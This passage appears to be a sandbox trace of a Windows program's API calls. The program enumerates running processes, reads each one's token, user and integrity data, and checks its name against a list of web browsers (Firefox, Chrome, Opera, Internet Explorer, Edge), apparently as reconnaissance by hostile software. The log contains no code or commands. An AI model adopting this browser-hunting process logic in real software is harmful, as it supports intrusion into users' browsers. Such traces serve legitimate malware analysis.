[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0245.250] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0245.250] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0245.250] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0245.250] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0245.250] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0245.250] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0245.250] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0245.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0x548 [0245.250] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0245.250] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0245.251] GetLastError () returned 0x7a [0245.251] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0245.251] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0245.251] CloseHandle (hObject=0x340) returned 1 [0245.251] CloseHandle (hObject=0x548) returned 1 [0245.251] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.251] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0245.251] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0245.251] GetLastError () returned 0x7a [0245.251] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0245.251] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0245.251] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0245.251] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0245.251] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0245.251] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0245.251] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0245.251] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0245.251] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0245.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0x548 [0245.251] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0245.251] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0245.251] GetLastError () returned 0x7a [0245.251] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0245.251] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0245.251] CloseHandle (hObject=0x340) returned 1 [0245.251] CloseHandle (hObject=0x548) returned 1 [0245.252] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.252] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0245.252] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0245.252] GetLastError () returned 0x7a [0245.252] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0245.252] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0245.252] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0245.252] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0245.252] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0245.252] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0245.252] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0245.252] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0245.252] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0245.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0245.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0245.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0245.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0245.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0245.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5fc) returned 0x548 [0245.252] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0245.252] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0245.252] GetLastError () returned 0x7a [0245.252] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0245.252] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0245.252] CloseHandle (hObject=0x340) returned 1 [0245.252] CloseHandle (hObject=0x548) returned 1 [0245.252] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.252] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0245.252] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0245.253] GetLastError () returned 0x7a [0245.253] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0245.253] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0245.253] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0245.253] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0245.253] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0245.253] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0245.253] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0245.253] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0245.253] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0245.253] VirtualFree (lpAddress=0x340000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0245.253] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0247.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0xfcfadc | out: SystemInformation=0x0, ResultLength=0xfcfadc*=0xbd58) returned 0xc0000004 [0247.252] VirtualAlloc (lpAddress=0x0, dwSize=0xcd58, flAllocationType=0x1000, flProtect=0x4) returned 0x340000 [0247.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x340000, Length=0xcd58, ResultLength=0x0 | out: SystemInformation=0x340000, ResultLength=0x0) returned 0x0 [0247.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0247.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0247.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0247.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0247.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0247.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0247.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0247.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0247.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0247.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0247.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0247.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0247.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0247.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0247.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0247.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0247.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0247.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0247.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0247.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0247.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0247.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0x548 [0247.253] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0247.253] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0247.253] GetLastError () returned 0x7a [0247.253] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0247.253] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0247.253] CloseHandle (hObject=0x340) returned 1 [0247.253] CloseHandle (hObject=0x548) returned 1 [0247.253] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.253] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0247.253] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0247.253] GetLastError () returned 0x7a [0247.253] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0247.253] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0247.253] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0247.253] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0247.253] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0247.253] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0247.253] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0247.253] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0247.253] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0247.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0x548 [0247.254] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0247.254] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0247.254] GetLastError () returned 0x7a [0247.254] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0247.254] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0247.254] CloseHandle (hObject=0x340) returned 1 [0247.254] CloseHandle (hObject=0x548) returned 1 [0247.254] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.254] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0247.254] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0247.254] GetLastError () returned 0x7a [0247.254] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0247.254] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0247.254] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0247.254] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0247.254] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0247.254] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0247.254] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0247.254] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0247.254] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0247.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0x548 [0247.254] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0247.254] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0247.254] GetLastError () returned 0x7a [0247.254] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0247.254] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0247.254] CloseHandle (hObject=0x340) returned 1 [0247.254] CloseHandle (hObject=0x548) returned 1 [0247.254] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.254] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0247.254] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0247.254] GetLastError () returned 0x7a [0247.255] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0247.255] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0247.255] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0247.255] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0247.255] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0247.255] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0247.255] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0247.255] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0247.255] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0247.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0247.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0247.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x548 [0247.255] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0247.255] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0247.255] GetLastError () returned 0x7a [0247.255] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0247.255] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0247.255] CloseHandle (hObject=0x340) returned 1 [0247.255] CloseHandle (hObject=0x548) returned 1 [0247.255] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.255] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0247.255] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0247.255] GetLastError () returned 0x7a [0247.255] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0247.255] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0247.255] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0247.255] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0247.255] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0247.255] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0247.255] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0247.255] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0247.255] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0247.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x548 [0247.255] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0247.255] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0247.256] GetLastError () returned 0x7a [0247.256] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0247.256] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0247.256] CloseHandle (hObject=0x340) returned 1 [0247.256] CloseHandle (hObject=0x548) returned 1 [0247.256] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.256] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0247.256] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0247.256] GetLastError () returned 0x7a [0247.256] GetTokenInformation (in: 